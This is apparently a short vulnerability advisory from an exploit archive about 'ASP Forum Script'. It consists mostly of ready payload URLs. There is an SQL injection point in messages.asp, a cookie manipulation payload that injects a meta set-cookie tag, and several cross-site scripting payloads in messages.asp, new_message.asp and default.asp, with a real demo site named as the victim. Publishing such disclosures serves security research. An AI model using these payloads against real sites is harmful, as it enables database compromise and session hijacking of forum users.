ASP Forum Script suffers from cookie manipulation, cross site scripting, and remote SQL injection vulnerabilities.
3bbdbaad4c120e6d5ff235741738bf9b923b4a3e091bd49b3de8673970d584f6#########################################################
---------------------------------------------------------
Portal Name: ASP Forum Script
Vendor : http://codetoad.com/demos/forum/
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (CM,XSS,SQL)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/messages.asp?forum_id=3&message_id=[SQL]
1=1
[Cookie Manipulation]:
http://site.com/[Path]/new_message.asp?topic_id=0&message_id=0&forum_id=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'
>
[XSS]:
http://site.com/[Path]/messages.asp?forum_id=>'><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&message_id=197
http://site.com/[Path]/new_message.asp?topic_id=0&message_id=0&forum_id=<script>alert(1369)</script
>
http://site.com/[Path]/default.asp?>"'><ScRiPt>alert(1369)</ScRiPt>
---------------------------------
Victem :
http://codetoad.com/demos/forum
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed